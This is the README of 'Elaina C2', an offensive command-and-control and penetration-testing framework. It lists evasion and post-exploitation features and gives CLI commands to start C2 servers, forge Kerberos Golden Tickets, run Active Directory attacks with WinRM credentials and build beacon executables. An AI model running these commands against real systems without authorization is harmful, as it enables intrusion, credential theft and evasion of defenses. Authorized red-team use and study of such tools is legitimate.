This is only a weak demo version and will not meet everyone’s expectations.
Use it strictly for educational and authorized penetration testing purposes only.
Elaina C2 (codename: Elaina Cute) is a modular penetration testing and C2 framework that comes with both a command-line interface (CLI) and a graphical user interface (GUI).
It is designed to assist security professionals in Active Directory assessments, red team operations, and advanced post-exploitation scenarios.
- Active Directory Certificate Services (ADCS) exploitation
- Kerberos Golden Ticket generation
- NTLM Relay attacks
- Web exploitation: SQL Injection, SSRF, LFI, XXE, IDOR
- Redis RCE
- Anti-debugging & Anti-VM checks
- AMSI & ETW bypass
- Adaptive traffic shaping
- Random domain generation for obfuscation
- Real-time dashboard
- Beacon & attack management
- Remote file/system interaction
- Built-in script editor & browser
- Protocols: HTTP(S), DNS, TCP, SMB
- Encrypted communication
- Smart Beaconing
- Silver C2 with advanced stealth
- Credential harvesting
- Network mapping & system inventory
- Remote screenshotting
- File upload/download
- Python 3.8+
- OS: Windows, Linux, macOS
- RAM: Minimum 4GB (8GB+ recommended)
- Disk Space: 500MB+
- Clone the repository and install dependencies:
git clone https://github.com/yuri08loveelaina/elaina-c2.git
cd elaina-c2
sudo apt install python3-pip python3-venv
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
sudo apt update
- Install Dependencies
pip install PyQt5 selenium requests beautifulsoup4 colorama \
undetected-chromedriver selenium-wire impacket \
stem cryptography cloudscraper certipy
python elaina-cute.py --gui
- Or simply run without arguments
python elaina-cute.py
- Web scan
python elaina-cute.py https://example.com
- With TOR
python elaina-cute.py https://example.com --tor
- LDAP subnet scan
python elaina-cute.py https://example.com --ldap-subnet 10.0.0.0/24
- With Burp Suite
python elaina-cute.py https://example.com --burp
- Start C2 Server (HTTP)
python elaina-cute.py --c2-server --c2-host 0.0.0.0 --c2-port 8080
- Start C2 Server (HTTPS)
python elaina-cute.py --c2-server --c2-host 0.0.0.0 --c2-port 8443 \
--c2-ssl --c2-cert /path/to/cert.pem --c2-key /path/to/key.pem
- Golden Ticket Generation
python elaina-cute.py --golden-ticket \
--gt-domain EXAMPLE.COM --gt-user administrator \
--gt-krbtgt-hash <hash> --gt-sid <sid>
- Complete AD Assessment
python elaina-cute.py https://internal.example.com \
--ldap-subnet 10.0.0.0/24 --winrm-user admin --winrm-pass password
- Generate Beacon from CLI
python elaina-cute.py --generate-beacon --listener-name http-listener \
--output-format exe --profile-path /path/to/profile.profile \
--output-path /path/to/beacon.exe
| Option | Description |
|---|---|
--gui |
Launch GUI interface |
--tor |
Route traffic through TOR |
--tor-pass |
TOR control password (default: yuriontop) |
--burp |
Forward requests to Burp Repeater API |
--ldap-subnet |
Scan subnet via LDAP |
--winrm-user |
WinRM username |
--winrm-pass |
WinRM password |
--pfx-path |
Path to .pfx certificate |
--pfx-password |
Password for .pfx certificate |
--golden-ticket |
Generate Kerberos Golden Ticket |
--c2-server |
Start C2 server |
--c2-beacon |
Start C2 beacon |
--silver-c2 |
Start Silver C2 beacon |
--generate-beacon |
Generate a beacon from CLI |
--listener-name |
Name of the listener to use for beacon |
--output-format |
Output format of the beacon (exe, py, ps1, raw) |
--profile-path |
Path to the .profile or .json file |
--output-path |
Path to save the generated beacon |
- Core Engine – exploitation & post-exploitation
- C2 Framework – beacon management & communications
- GUI – PyQt5-based dashboard
- CLI – automation & scripting interface
- Encryption Module – secure comms
- Evasion Module – stealth & defense bypass
This project is licensed under the MIT License – see the LICENSE file.
This tool is for educational and authorized security testing only.
The authors are not responsible for any misuse.
- Impacket Project – networking backbone
- PyQt5 Team – GUI framework
- Security researchers for techniques & inspiration
- All contributors ❤️